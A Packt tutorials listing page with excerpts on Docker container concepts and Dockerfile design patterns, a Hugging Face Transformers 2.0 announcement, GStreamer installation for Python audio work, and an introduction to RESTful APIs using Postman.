Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

6719 Articles
article-image-understanding-container-scenarios-and-overview-docker
Packt
24 Jan 2017
17 min read
Save for later

Understanding Container Scenarios and Overview of Docker

Packt
24 Jan 2017
17 min read
Docker is one of the recent most successful open source project which provides packaging, shipping, and running any application as light weight containers. We can actually compare Docker containers as shipping containers that provides standard consistent way of shipping any application. Docker is fairly a new project and with help of this article it will be easy to troubleshoot some of the common problems which Docker users face while installing and using Dockers containers. In this article by Rajdeep Dua, Vaibhav Kohli, and John Wooten authors of the book Troubleshooting Docker, the emphasis will be on the following topics; Decoding containers Diving into Docker Advantages of Docker containers Docker lifecycle Docker design patterns Unikernels (For more resources related to this topic, see here.) Decoding containers Containerization are an alternative to virtual machine which involves encapsulation of applications and providing it with its own operating environment. The basic foundation for containers is Linux containers (LXC) which is user space interface for Linux Kernel containment features. With help of powerful API and simple tools it lets Linux users create and manage application containers. LXC containers are in-between of chroot and full-fledged virtual machine. Another key difference with containerization from traditional hypervisor's is that containers share the Linux Kernel used by operating system running the host machine, thus multiple containers running in the same machine uses the same Linux Kernel. It gives the advantage of being fast with almost zero performance overhead compared to VMs. Major use cases of containers are listed in the further sections. OS container OS containers can be easily imagined as a Virtual Machine (VM) but unlike a VM they share the Kernel of the host operating system but provide user space isolation. Similar to a VM dedicated resources can be assigned to containers and we can install, configure and run different application, libraries, and so on. Just as you would run on any VM. OS containers are helpful in case of scalability testing where fleet of containers can be deployed easily with different flavors of distros, which is very less expensive compared to deployment of VM's. Container are created from templates or images that determine the structure and contents of the container. It allows to create a container with identical environment, same package version, and configuration across all containers mostly used in case of dev environment setups. There are various container technologies like LXC, OpenVZ , Docker, and BSD jails which are suitable for OS containers. Figure 1: OS based container Application containers Application containers are designed to run a single service in the package, while OS containers which are explained previously can support multiple processes. Application containers are getting lot of attraction after launch of Docker and Rocket. Whenever container is launched it runs a single process. This process runs an application process but in case of OS containers it runs multiple services on the same OS. Containers usually have a layered approach as in case of Docker container which helps in reduced duplication and increased re-use. Container can be started with base image common for all components and then we can go on adding layers in the file system that are specific to the component. Layered file system helps to rollback changes as we can simple switch to old layers if required. The run command which is specified in Dockerfile adds a new layer for the container. The main purpose of application containers is to package different component of the application in separate container. The different component of the application which are packaged separately in container then interact with help of API's and services. The distributed multi-component system deployment is the basic implementation of micro-service architecture. In the preceding approach developer gets the freedom to package the application as per his requirement and IT team gets the privilege to deploy the container on multiple platforms in order to scale the system both horizontally as well as vertically. Hypervisor is virtual machine monitor (VMM), used to allow multiple operation system to run and share the hardware resources from the host. Each virtual machine is termed as guest machine. The following simple example explains the difference between application container and OS containers: Figure 2: Docker layers Let's consider the example of web three-tier architecture we have a database tier such as MySQL, Nginx for load balancer and application tier as Node.js: Figure 3: OS container In case of OS container we can pick up by default Ubuntu as the base container and install services MySQL, Nginx, Node.js using Dockerfile. This type of packaging is good for testing or for development setup where all the services are packaged together and can be shipped and shared across developer's. But deploying this architecture for production cannot be done with OS containers as there is no consideration of data scalability and isolation. Application containers helps to meet this use case as we can scale the required component by deploying more application specific containers and it also helps to meet load-balancing and recovery use-case. For the preceding three-tier architecture each of the services will be packaged into separate containers in order to fulfill the architecture deployment use-case. Figure 4: Application containers scaled up Main difference between OS and application containers are: OS container Application container Meant to run multiple services on same OS container Meant to run single service Natively, No layered filesystem Layered filesystem Example: LXC, OpenVZ, BSD Jails Example: Docker, Rocket Diving into Docker Docker is a container implementation that has gathered enormous interest in recent years. It neatly bundles various Linux Kernel features and services like namespaces, cgroups, SELinux, and AppArmor profiles and so on with Union files systems like AUFS, BTRFS to make modular images. These images provides highly configurable virtualized environment for applications and follows write-once-run-anywhere principle. Application can be as simple as running a process to a highly scalable and distributed processes working together. Docker is getting a lot of traction in industry, because of its performance savvy, and universal replicability architecture, meanwhile providing the following four cornerstones of modern application development: Autonomy Decentralization Parallelism Isolation Furthermore, wide-scale adaptation of Thoughtworks's micro services architecture or Lots of Small Applications (LOSA) is further bringing potential in Docker technology. As a result, big companies like Google, VMware, and Microsoft have already ported Docker to their infrastructure, and the momentum is continued by the launch of myriad of Docker startups namely Tutum, Flocker, Giantswarm and so on. Since Docker containers replicate their behavior anywhere, be it your development machine, a bare-metal server, virtual machine, or datacenter, application designers can focus their attention on development, while operational semantics are left with Devops. This makes team workflow modular, efficient and productive. Docker is not to be confused with VM, even though they are both virtualization technologies. Where Docker shares an OS, meanwhile providing sufficient level of isolation and security to applications running in containers, later completely abstracts out OS and gives strong isolation and security guarantees. But Docker resource footprint is minuscule in comparison to VM, and hence preferred for economy and performance. However, it still cannot completely replace VM, and hence is complementary to VM technology: Figure 5: VM and Docker architecture Advantages of Docker containers Following listed are some of the advantages of using Docker containers in Micro-service architecture: Rapid application deployment: With minimal runtime containers can be deployed quickly because of the reduced size as only application is packaged. Portability: An application with its operating environment (dependencies) can be bundled together into a single Docker container that is independent from the OS version or deployment model. The Docker containers can be easily transferred to another machine that runs Docker container and executed without any compatibility issues. As well Windows support is also going to be part of future Docker releases. Easily sharable: Pre-built container images can be easily shared with help of public repositories as well as hosted private repositories for internal use. Lightweight footprint: Even the Docker images are very small and have minimal footprint to deploy new application with help of containers. Reusability: Successive versions of Docker containers can be easily built as well as roll-backed to previous versions easily whenever required. It makes them noticeably lightweight as components from the pre-existing layers can be reused. Docker lifecycle These are some of the basic steps involved in the lifecycle of Docker container: Build the Docker image with help of Dockerfile which contains all the commands required to be packaged. It can run in the following way: Docker build Tag name can be added in following way: Docker build -t username/my-imagename If Dockerfile exists at different path then the Docker build command can be executed by providing –f flag: Docker build -t username/my-imagename -f /path/Dockerfile After the image creation, in order to deploy the container Docker run can be used. The running containers can be checked with help of Docker pscommand, which list the currently active containers. There are two more commands to be discussed; Docker pause: This command used cgroups freezer to suspend all the process running in container, internally it uses SIGSTOP signal. Using this command process can be easily suspended and resumed whenever required. Docker start: This command is used to either start the paused or stopped container. After the usage of container is done it can either be stopped or killed; Docker stop: command will gracefully stop the running container by sending SIGTERM and then SIGKILL command. In this case container can still be listed by using Docker ps –a command. Docker kill will kill the running container by sending SIGKILL to main process running inside the container. If there are some changes made to the container while it is running, which are likely to be preserved, container can be converted back to image by using the Docker commit after container has been stopped. Figure 6: Docker lifecycle Docker design patterns Following listed are some of the Docker design patterns with examples. Dockerfile is the base structure from which we define a Docker image it contains all the commands to assemble an image. Using Docker build command we can create automated build that executes all the previously mentioned command-line instructions to create an image: $ Docker build Sending build context to Docker daemon 6.51 MB ... Design patterns listed further can help in creating Docker images that persist in volumes and provides various other flexibility so that they can be re-created or replaced easily at any time. The base image sharing For creating a web-based application or blog we can create a base image which can be shared and help to deploy the application with ease. This patterns helps out as it tries to package all the required services on top of one base image, so that this web application blog image can be re-used anywhere: FROM debian:wheezy RUN apt-get update RUN apt-get -y install ruby ruby-dev build-essential git # For debugging RUN apt-get install -y gdb strace # Set up my user RUN useradd vkohli -u 1000 -s /bin/bash --no-create-home RUN gem install -n /usr/bin bundler RUN gem install -n /usr/bin rake WORKDIR /home/vkohli/ ENV HOME /home/vkohli VOLUME ["/home"] USER vkohli EXPOSE 8080 The preceding Dockerfile shows the standard way of creating an application-based image. Docker image is a zipped file which is a snapshot of all the configuration parameters as well as the changes made in the base image (Kernel of the OS). It installs some specific tools (Ruby tools rake and bundler) on top of Debian base image. It creates a new user adds it to the container image and specifies the working directory by mounting /home directory from the host which is explained in detail in next section. Shared volume Sharing the volume at host level allows other containers to pick up the shared content required by them. This helps in faster rebuilding of Docker image or add/modify/remove dependencies. Example if we are creating the homepage deployment of the previously mentioned blog only directory required to be shared is /home/vkohli/src/repos/homepage directory with this web app container through the Dockerfile in the following way: FROM vkohli/devbase WORKDIR /home/vkohli/src/repos/homepage ENTRYPOINT bin/homepage web For creating the dev version of the blog we can share the folder /home/vkohli/src/repos/blog where all the related developer files can reside. And for creating the dev-version image we can take the base image from pre-created devbase: FROM vkohli/devbase WORKDIR / USER root # For Graphivz integration RUN apt-get update RUN apt-get -y install graphviz xsltproc imagemagick USER vkohli WORKDIR /home/vkohli/src/repos/blog ENTRYPOINT bundle exec rackup -p 8080 Dev-tools container For development purpose we have separate dependencies in dev and production environment which easily gets co-mingled at some point. Containers can be helpful in differentiating the dependencies by packaging them separately. As shown in the following example we can derive the dev tools container image from the base image and install development dependencies on top of it even allowing ssh connection so that we to work upon the code: FROM vkohli/devbase RUN apt-get update RUN apt-get -y install openssh-server emacs23-nox htop screen # For debugging RUN apt-get -y install sudo wget curl telnet tcpdump # For 32-bit experiments RUN apt-get -y install gcc-multilib # Man pages and "most" viewer: RUN apt-get install -y man most RUN mkdir /var/run/sshd ENTRYPOINT /usr/sbin/sshd -D VOLUME ["/home"] EXPOSE 22 EXPOSE 8080 As can be seen previously basic tools such as wget, curl, tcpdump are installed which are required during development. Even SSHD service is installed which allows to ssh connection into the dev container. Test environment container Testing the code in different environment always eases the process and helps to find more bugs in isolation. We can create a ruby environment in separate container to spawn a new ruby shell and use it to test the code base: FROM vkohli/devbase RUN apt-get update RUN apt-get -y install ruby1.8 git ruby1.8-dev In the preceding Dockerfile we are using the base image as devbase and with help of just one command Docker run can easily create a new environment by using the image created from this Dockerfile to test the code. The build container We have built steps involved in the application that are sometimes expensive. In order to overcome this we can create a separate a build container which can use the dependencies needed during build process. Following Dockerfile can be used to run a separate build process: FROM sampleapp RUN apt-get update RUN apt-get install -y build-essential [assorted dev packages for libraries] VOLUME ["/build"] WORKDIR /build CMD ["bundler", "install","--path","vendor","--standalone"] /build directory is the shared directory that can be used to provide the compiled binaries also we can mount the /build/source directory in the container to provide updated dependencies. Thus by using build container we can decouple the build process and final packaging part in separate containers. It still encapsulates both the process and dependencies by breaking the previous process in separate containers. The installation container The purpose of this container is to package the installation steps in separate container. Basically, in order to provide deployment of container in production environment. Sample Dockerfile to package the installation script inside Docker image as follows: ADD installer /installer CMD /installer.sh The installer.sh can contain the specific installation command to deploy container in production environment and also to provide the proxy setup with DNS entry in order to have the cohesive environment deployed. Service-in-a-box container In order to deploy the complete application in a container we can bundle multiple services to provide the complete deployment container. In this case we bundle web app, API service and database together in one container. It helps to ease the pain of inter-linking various separate containers: services: web: git_url: [email protected]:vkohli/sampleapp.git git_branch: test command: rackup -p 3000 build_command: rake db:migrate deploy_command: rake db:migrate log_folder: /usr/src/app/log ports: ["3000:80:443", "4000"] volumes: ["/tmp:/tmp/mnt_folder"] health: default api: image: quay.io/john/node command: node test.js ports: ["1337:8080"] requires: ["web"] databases: - "mysql" - "redis" Infrastructure container As we have talked about the container usage in development environment, there is one big category missing the usage of container for infrastructure services such as proxy setup which provides a cohesive environment in order to provide the access to application. In the following mentioned Dockerfile example we can see that haproxy is installed and links to its configuration file is provided: FROM debian:wheezy ADD wheezy-backports.list /etc/apt/sources.list.d/ RUN apt-get update RUN apt-get -y install haproxy ADD haproxy.cfg /etc/haproxy/haproxy.cfg CMD ["haproxy", "-db", "-f", "/etc/haproxy/haproxy.cfg"] EXPOSE 80 EXPOSE 443 Haproxy.cfg is the configuration file responsible for authenticating a user: backend test acl authok http_auth(adminusers) http-request auth realm vkohli if !authok server s1 192.168.0.44:8084 Unikernels Unikernels compiles source code into a custom operating system that includes only the functionality required by the application logic producing a specialized single address space machine image, eliminating unnecessary code. Unikernels is built using library operating system, which has the following benefits compared to traditional OS: Fast Boot time: Unikernels make provisioning highly dynamic and can boot in less than second. Small Footprint: Unikernel code base is smaller than the traditional OS equivalents and pretty much easy to manage. Improved security: As unnecessary code is not deployed, the attack surface is drastically reduced. Fine-grained optimization: Unikernels are constructed using compile tool chain and are optimized for device drivers and application logic to be used. Unikernels matches very well with the micro-services architecture as both source code and generated binaries can be easily version-controlled and are compact enough to be rebuild. Whereas on other side modifying VM's is not permitted and changes can be only made to source code which is time-consuming and hectic. For example, if the application doesn't require disk access and display facility. Unikernels can help to remove this unnecessary device drivers and display functionality from the Kernel. Thus production system becomes minimalistic only packaging the application code, runtime environment and OS facilities which is the basic concept of immutable application deployment where new image is constructed if any application change is required in production servers: Figure 7: Transition from traditional container to Unikernel based containers Container and Unikernels are best fit for each other. Recently, Unikernel system has become part of Docker and the collaboration of both this technology will be seen sooner in the next Docker release. As it is explained in the preceding diagram the first one shows the traditional way of packaging one VM supporting multiple Docker containers. The next step shows 1:1 map (one container per VM) which allows each application to be self-contained and gives better resource usage but creating a separate VM for each container adds an overhead. In the last step we can see the collaboration of Unikernels with the current existing Docker tools and eco-system, where container will get the Kernel low-library environment specific to its need. Adoption of Unikernels in Docker toolchain will accelerate the progress of Unikernels and it will be widely used and will be understood as packaging model and runtime framework making Unikernels as another type of container. After the Unikernels abstraction for Docker developers, we will be able to choose either to use traditional Docker container or use the Unikernel container in order to create the production environment. Summary In this article we studied about the basic containerization concept with help of application and OS-based containers. And the differences between them explained in this article will clearly help the developers to choose the containerization approach which fits perfectly for their system. We have thrown some light around the Docker technology, its advantages and lifecycle of Docker container. The eight Docker design patterns explained in this article clearly shows the way to implement Docker containers in production environment. Resources for Article: Further resources on this subject: Orchestration with Docker Swarm [article] Benefits and Components of Docker [article] Docker Hosts [article]
Read more
  • 0
  • 1
  • 5982

article-image-transformers-2-0-nlp-library-with-deep-interoperability-between-tensorflow-2-0-and-pytorch
Fatema Patrawala
30 Sep 2019
3 min read
Save for later

Transformers 2.0: NLP library with deep interoperability between TensorFlow 2.0 and PyTorch, and 32+ pretrained models in 100+ languages

Fatema Patrawala
30 Sep 2019
3 min read
Last week, Hugging Face, a startup specializing in natural language processing, released a landmark update to their popular Transformers library, offering unprecedented compatibility between two major deep learning frameworks, PyTorch and TensorFlow 2.0. Transformers (formerly known as pytorch-transformers and pytorch-pretrained-bert) provides general-purpose architectures (BERT, GPT-2, RoBERTa, XLM, DistilBert, XLNet…) for Natural Language Understanding (NLU) and Natural Language Generation (NLG) with over 32+ pretrained models in 100+ languages and deep interoperability between TensorFlow 2.0 and PyTorch. Transformers 2.0 embraces the ‘best of both worlds’, combining PyTorch’s ease of use with TensorFlow’s production-grade ecosystem. The new library makes it easier for scientists and practitioners to select different frameworks for the training, evaluation and production phases of developing the same language model. “This is a lot deeper than what people usually think when they talk about compatibility,” said Thomas Wolf, who leads Hugging Face’s data science team. “It’s not only about being able to use the library separately in PyTorch and TensorFlow. We’re talking about being able to seamlessly move from one framework to the other dynamically during the life of the model.” https://twitter.com/Thom_Wolf/status/1177193003678601216 “It’s the number one feature that companies asked for since the launch of the library last year,” said Clement Delangue, CEO of Hugging Face. Notable features in Transformers 2.0 8 architectures with over 30 pretrained models, in more than 100 languages Load a model and pre-process a dataset in less than 10 lines of code Train a state-of-the-art language model in a single line with the tf.keras fit function Share pretrained models, reducing compute costs and carbon footprint Deep interoperability between TensorFlow 2.0 and PyTorch models Move a single model between TF2.0/PyTorch frameworks at will Seamlessly pick the right framework for training, evaluation, production As powerful and concise as Keras About Hugging Face Transformers With half a million installs since January 2019, Transformers is the most popular open-source NLP library. More than 1,000 companies including Bing, Apple or Stitchfix are using it in production for text classification, question-answering, intent detection, text generation or conversational. Hugging Face, the creators of Transformers, have raised US$5M so far from investors in companies like Betaworks, Salesforce, Amazon and Apple. On Hacker News, users are appreciating the company and how Transformers has become the most important library in NLP. Other interesting news in data Baidu open sources ERNIE 2.0, a continual pre-training NLP model that outperforms BERT and XLNet on 16 NLP tasks Dr Joshua Eckroth on performing Sentiment Analysis on social media platforms using CoreNLP Facebook open-sources PyText, a PyTorch based NLP modeling framework
Read more
  • 0
  • 0
  • 5981

article-image-python-multimedia-working-audios
Packt
30 Aug 2010
14 min read
Save for later

Python Multimedia: Working with Audios

Packt
30 Aug 2010
14 min read
(For more resources on Python, see here.) So let's get on with it! Installation prerequisites Since we are going to use an external multimedia framework, it is necessary to install the necessary to install the packages mentioned in this section. GStreamer GStreamer is a popular open source multimedia framework that supports audio/video manipulation of a wide range of multimedia formats. It is written in the C programming language and provides bindings for other programming languages including Python. Several open source projects use GStreamer framework to develop their own multimedia application. Throughout this article, we will make use of the GStreamer framework for audio handling. In order to get this working with Python, we need to install both GStreamer and the Python bindings for GStreamer. Windows platform The binary distribution of GStreamer is not provided on the project website http://www.gstreamer.net/. Installing it from the source may require considerable effort on the part of Windows users. Fortunately, GStreamer WinBuilds project provides pre-compiled binary distributions. Here is the URL to the project website: http://www.gstreamer-winbuild.ylatuya.es The binary distribution for GStreamer as well as its Python bindings (Python 2.6) are available in the Download area of the website: http://www.gstreamer-winbuild.ylatuya.es/doku.php?id=download You need to install two packages. First, the GStreamer and then the Python bindings to the GStreamer. Download and install the GPL distribution of GStreamer available on the GStreamer WinBuilds project website. The name of the GStreamer executable is GStreamerWinBuild-0.10.5.1.exe. The version should be 0.10.5 or higher. By default, this installation will create a folder C:gstreamer on your machine. The bin directory within this folder contains runtime libraries needed while using GStreamer. Next, install the Python bindings for GStreamer. The binary distribution is available on the same website. Use the executable Pygst-0.10.15.1-Python2.6.exe pertaining to Python 2.6. The version should be 0.10.15 or higher. GStreamer WinBuilds appears to be an independent project. It is based on the OSSBuild developing suite. Visit http://code.google.com/p/ossbuild/ for more information. It could happen that the GStreamer binary built with Python 2.6 is no longer available on the mentioned website at the time you are reading this book. Therefore, it is advised that you should contact the developer community of OSSBuild. Perhaps they might help you out! Alternatively, you can build GStreamer from source on the Windows platform, using a Linux-like environment for Windows, such as Cygwin (http://www.cygwin.com/). Under this environment, you can first install dependent software packages such as Python 2.6, gcc compiler, and others. Download the gst-python-0.10.17.2.tar.gz package from the GStreamer website http://www.gstreamer.net/. Then extract this package and install it from sources using the Cygwin environment. The INSTALL file within this package will have installation instructions. Other platforms Many of the Linux distributions provide GStreamer package. You can search for the appropriate gst-python distribution (for Python 2.6) in the package repository. If such a package is not available, install gst-python from the source as discussed in the earlier the Windows platform section. If you are a Mac OS X user, visit http://py26-gst-python.darwinports.com/. It has detailed instructions on how to download and install the package Py26-gst-python version 0.10.17 (or higher). Mac OS X 10.5.x (Leopard) comes with the Python 2.5 distribution. If you are using packages using this default version of Python, GStreamer Python bindings using Python 2.5 are available on the darwinports website: http://gst-python.darwinports.com/ PyGobject There is a free multiplatform software utility library called 'GLib'. It provides data structures such as hash maps, linked lists, and so on. It also supports the creation of threads. The 'object system' of GLib is called GObject. Here, we need to install the Python bindings for GObject. The Python bindings are available on the PyGTK website at: http://www.pygtk.org/downloads.html. Windows platform The binary installer is available on the PyGTK website. The complete URL is: http://ftp.acc.umu.se/pub/GNOME/binaries/win32/pygobject/2.20/?. Download and install version 2.20 for Python 2.6. Other platforms For Linux, the source tarball is available on the PyGTK website. There could even be binary distribution in the package repository of your Linux operating system. The direct link to the Version 2.21 of PyGObject (source tarball) is: http://ftp.gnome.org/pub/GNOME/sources/pygobject/2.21/ If you are a Mac user and you have Python 2.6 installed, a distribution of PyGObject is available at http://py26-gobject.darwinports.com/. Install version 2.14 or later. Summary of installation prerequisites The following table summarizes the packages needed for this article. Package Download location Version Windows platform Linux/Unix/OS X platforms GStreamer http://www.gstreamer.net/ 0.10.5 or later Install using binary distribution available on the Gstreamer WinBuild website: http://www.gstreamer-winbuild.ylatuya.es/doku.php?id=download Use GStreamerWinBuild-0.10.5.1.exe (or later version if available). Linux: Use GStreamer distribution in package repository. Mac OS X: Download and install by following instructions on the website: http://gstreamer.darwinports.com/. Python Bindings for GStreamer http://www.gstreamer.net/ 0.10.15 or later for Python 2.6 Use binary provided by GStreamer WinBuild project. See http://www.gstreamer-winbuild.ylatuya.es for details pertaining to Python 2.6. Linux: Use gst-python distribution in the package repository. Mac OS X: Use this package (if you are using Python2.6): http://py26-gst-python.darwinports.com/. Linux/Mac: Build and install from the source tarball. Python bindings for GObject "PyGObject" Source distribution: http://www.pygtk.org/downloads.html 2.14 or later for Python 2.6 Use binary package from pygobject-2.20.0.win32-py2.6.exe Linux: Install from source if pygobject is not available in the package repository. Mac: Use this package on darwinports (if you are using Python2.6) See http://py26-gobject.darwinports.com/ for details. Testing the installation Ensure that the GStreamer and its Python bindings are properly installed. It is simple to test this. Just start Python from the command line and type the following: >>>import pygst If there is no error, it means the Python bindings are installed properly. Next, type the following: >>>pygst.require("0.10")>>>import gst If this import is successful, we are all set to use GStreamer for processing audios and videos! If import gst fails, it will probably complain that it is unable to work some required DLL/shared object. In this case, check your environment variables and make sure that the PATH variable has the correct path to the gstreamer/bin directory. The following lines of code in a Python interpreter show the typical location of the pygst and gst modules on the Windows platform. >>> import pygst>>> pygst<module 'pygst' from 'C:Python26libsite-packagespygst.pyc'>>>> pygst.require('0.10')>>> import gst>>> gst<module 'gst' from 'C:Python26libsite-packagesgst-0.10gst__init__.pyc'> Next, test if PyGObject is successfully installed. Start the Python interpreter and try importing the gobject module. >>import gobject If this works, we are all set to proceed! A primer on GStreamer In this article, we will be using GStreamer multimedia framework extensively. Before we move on to the topics that teach us various audio processing techniques, a primer on GStreamer is necessary. So what is GStreamer? It is a framework on top of which one can develop multimedia applications. The rich set of libraries it provides makes it easier to develop applications with complex audio/video processing capabilities. Fundamental components of GStreamer are briefly explained in the coming sub-sections. Comprehensive documentation is available on the GStreamer project website. GStreamer Application Development Manual is a very good starting point. In this section, we will briefly cover some of the important aspects of GStreamer. For further reading, you are recommended to visit the GStreamer project website: http://www.gstreamer.net/documentation/ gst-inspect and gst-launch We will start by learning the two important GStreamer commands. GStreamer can be run from the command line, by calling gst-launch-0.10.exe (on Windows) or gst-launch-0.10(on other platforms). The following command shows a typical execution of GStreamer on Linux. We will see what a pipeline means in the next sub-section. $gst-launch-0.10 pipeline_description GStreamer has a plugin architecture. It supports a huge number of plugins. To see more details about any plugin in your GStreamer installation, use the command gst-inspect-0.10 (gst-inspect-0.10.exe on Windows). We will use this command quite often. Use of this command is illustrated here. $gst-inspect-0.10 decodebin Here, decodebin is a plugin. Upon execution of the preceding command, it prints detailed information about the plugin decodebin. Elements and pipeline In GStreamer, the data flows in a pipeline. Various elements are connected together forming a pipeline, such that the output of the previous element is the input to the next one. A pipeline can be logically represented as follows: Element1 ! Element2 ! Element3 ! Element4 ! Element5 Here, Element1 through to Element5 are the element objects chained together by the symbol !. Each of the elements performs a specific task. One of the element objects performs the task of reading input data such as an audio or a video. Another element decodes the file read by the first element, whereas another element performs the job of converting this data into some other format and saving the output. As stated earlier, linking these element objects in a proper manner creates a pipeline. The concept of a pipeline is similar to the one used in Unix. Following is a Unix example of a pipeline. Here, the vertical separator | defines the pipe. $ls -la | more Here, the ls -la lists all the files in a directory. However, sometimes, this list is too long to be displayed in the shell window. So, adding | more allows a user to navigate the data. Now let's see a realistic example of running GStreamer from the command prompt. $ gst-launch-0.10 -v filesrc location=path/to/file.ogg ! decodebin ! audioconvert ! fakesink For a Windows user, the gst command name would be gst-launch-0.10.exe. The pipeline is constructed by specifying different elements. The !symbol links the adjacent elements, thereby forming the whole pipeline for the data to flow. For Python bindings of GStreamer, the abstract base class for pipeline elements is gst.Element, whereas gst.Pipeline class can be used to created pipeline instance. In a pipeline, the data is sent to a separate thread where it is processed until it reaches the end or a termination signal is sent. Plugins GStreamer is a plugin-based framework. There are several plugins available. A plugin is used to encapsulate the functionality of one or more GStreamer elements. Thus we can have a plugin where multiple elements work together to create the desired output. The plugin itself can then be used as an abstract element in the GStreamer pipeline. An example is decodebin. We will learn about it in the upcoming sections. A comprehensive list of available plugins is available at the GStreamer website http://gstreamer.freedesktop.org. In almost all applications to be developed, decodebin plugin will be used. For audio processing, the functionality provided by plugins such as gnonlin, audioecho, monoscope, interleave, and so on will be used. Bins In GStreamer, a bin is a container that manages the element objects added to it. A bin instance can be created using gst.Bin class. It is inherited from gst.Element and can act as an abstract element representing a bunch of elements within it. A GStreamer plugin decodebin is a good example representing a bin. The decodebin contains decoder elements. It auto-plugs the decoder to create the decoding pipeline. Pads Each element has some sort of connection points to handle data input and output. GStreamer refers to them as pads. Thus an element object can have one or more "receiver pads" termed as sink pads that accept data from the previous element in the pipeline. Similarly, there are 'source pads' that take the data out of the element as an input to the next element (if any) in the pipeline. The following is a very simple example that shows how source and sink pads are specified. >gst-launch-0.10.exe fakesrc num-bufferes=1 ! fakesink The fakesrc is the first element in the pipeline. Therefore, it only has a source pad. It transmits the data to the next linkedelement, that is fakesink which only has a sink pad to accept elements. Note that, in this case, since these are fakesrc and fakesink, just empty buffers are exchanged. A pad is defined by the class gst.Pad. A pad can be attached to an element object using the gst.Element.add_pad() method. The following is a diagrammatic representation of a GStreamer element with a pad. It illustrates two GStreamer elements within a pipeline, having a single source and sink pad. Now that we know how the pads operate, let's discuss some of special types of pads. In the example, we assumed that the pads for the element are always 'out there'. However, there are some situations where the element doesn't have the pads available all the time. Such elements request the pads they need at runtime. Such a pad is called a dynamic pad. Another type of pad is called ghost pad. These types are discussed in this section.   Dynamic pads Some objects such as decodebin do not have pads defined when they are created. Such elements determine the type of pad to be used at the runtime. For example, depending on the media file input being processed, the decodebin will create a pad. This is often referred to as dynamic pad or sometimes the available pad as it is not always available in elements such as decodebin. Ghost pads As stated in the Bins section a bin object can act as an abstract element. How is it achieved? For that, the bin uses 'ghost pads' or 'pseudo link pads'. The ghost pads of a bin are used to connect an appropriate element inside it. A ghost pad can be created using gst.GhostPad class. Caps The element objects send and receive the data by using the pads. The type of media data that the element objects will handle is determined by the caps (a short form for capabilities). It is a structure that describes the media formats supported by the element. The caps are defined by the class gst.Caps. Bus A bus refers to the object that delivers the message generated by GStreamer. A message is a gst.Message object that informs the application about an event within the pipeline. A message is put on the bus using the gst.Bus.gst_bus_post() method. The following code shows an example usage of the bus. 1 bus = pipeline.get_bus()2 bus.add_signal_watch()3 bus.connect("message", message_handler) The first line in the code creates a gst.Bus instance. Here the pipeline is an instance of gst.PipeLine. On the next line, we add a signal watch so that the bus gives out all the messages posted on that bus. Line 3 connects the signal with a Python method. In this example, the message is the signal string and the method it calls is message_handler. Playbin/Playbin2 Playbin is a GStreamer plugin that provides a high-level audio/video player. It can handle a number of things such as automatic detection of the input media file format, auto-determination of decoders, audio visualization and volume control, and so on. The following line of code creates a playbin element. playbin = gst.element_factory_make("playbin") It defines a property called uri. The URI (Uniform Resource Identifier) should be an absolute path to a file on your computer or on the Web. According to the GStreamer documentation, Playbin2 is just the latest unstable version but once stable, it will replace the Playbin. A Playbin2 instance can be created the same way as a Playbin instance. gst-inspect-0.10 playbin2 With this basic understanding, let us learn about various audio processing techniques using GStreamer and Python.
Read more
  • 0
  • 0
  • 5981

article-image-creating-restful-api
Packt
19 Sep 2014
24 min read
Save for later

Creating a RESTful API

Packt
19 Sep 2014
24 min read
In this article by Jason Krol, the author of Web Development with MongoDB and NodeJS, we will review the following topics: (For more resources related to this topic, see here.) Introducing RESTful APIs Installing a few basic tools Creating a basic API server and sample JSON data Responding to GET requests Updating data with POST and PUT Removing data with DELETE Consuming external APIs from Node What is an API? An Application Programming Interface (API) is a set of tools that a computer system makes available that provides unrelated systems or software the ability to interact with each other. Typically, a developer uses an API when writing software that will interact with a closed, external, software system. The external software system provides an API as a standard set of tools that all developers can use. Many popular social networking sites provide developer's access to APIs to build tools to support those sites. The most obvious examples are Facebook and Twitter. Both have a robust API that provides developers with the ability to build plugins and work with data directly, without them being granted full access as a general security precaution. As you will see with this article, providing your own API is not only fairly simple, but also it empowers you to provide your users with access to your data. You also have the added peace of mind knowing that you are in complete control over what level of access you can grant, what sets of data you can make read-only, as well as what data can be inserted and updated. What is a RESTful API? Representational State Transfer (REST) is a fancy way of saying CRUD over HTTP. What this means is when you use a REST API, you have a uniform means to create, read, and update data using simple HTTP URLs with a standard set of HTTP verbs. The most basic form of a REST API will accept one of the HTTP verbs at a URL and return some kind of data as a response. Typically, a REST API GET request will always return some kind of data such as JSON, XML, HTML, or plain text. A POST or PUT request to a RESTful API URL will accept data to create or update. The URL for a RESTful API is known as an endpoint, and while working with these endpoints, it is typically said that you are consuming them. The standard HTTP verbs used while interfacing with REST APIs include: GET: This retrieves data POST: This submits data for a new record PUT: This submits data to update an existing record PATCH: This submits a date to update only specific parts of an existing record DELETE: This deletes a specific record Typically, RESTful API endpoints are defined in a way that they mimic the data models and have semantic URLs that are somewhat representative of the data models. What this means is that to request a list of models, for example, you would access an API endpoint of /models. Likewise, to retrieve a specific model by its ID, you would include that in the endpoint URL via /models/:Id. Some sample RESTful API endpoint URLs are as follows: GET http://myapi.com/v1/accounts: This returns a list of accounts GET http://myapi.com/v1/accounts/1: This returns a single account by Id: 1 POST http://myapi.com/v1/accounts: This creates a new account (data submitted as a part of the request) PUT http://myapi.com/v1/accounts/1: This updates an existing account by Id: 1 (data submitted as part of the request) GET http://myapi.com/v1/accounts/1/orders: This returns a list of orders for account Id: 1 GET http://myapi.com/v1/accounts/1/orders/21345: This returns the details for a single order by Order Id: 21345 for account Id: 1 It's not a requirement that the URL endpoints match this pattern; it's just common convention. Introducing Postman REST Client Before we get started, there are a few tools that will make life much easier when you're working directly with APIs. The first of these tools is called Postman REST Client, and it's a Google Chrome application that can run right in your browser or as a standalone-packaged application. Using this tool, you can easily make any kind of request to any endpoint you want. The tool provides many useful and powerful features that are very easy to use and, best of all, free! Installation instructions Postman REST Client can be installed in two different ways, but both require Google Chrome to be installed and running on your system. The easiest way to install the application is by visiting the Chrome Web Store at https://chrome.google.com/webstore/category/apps. Perform a search for Postman REST Client and multiple results will be returned. There is the regular Postman REST Client that runs as an application built into your browser, and then separate Postman REST Client (packaged app) that runs as a standalone application on your system in its own dedicated window. 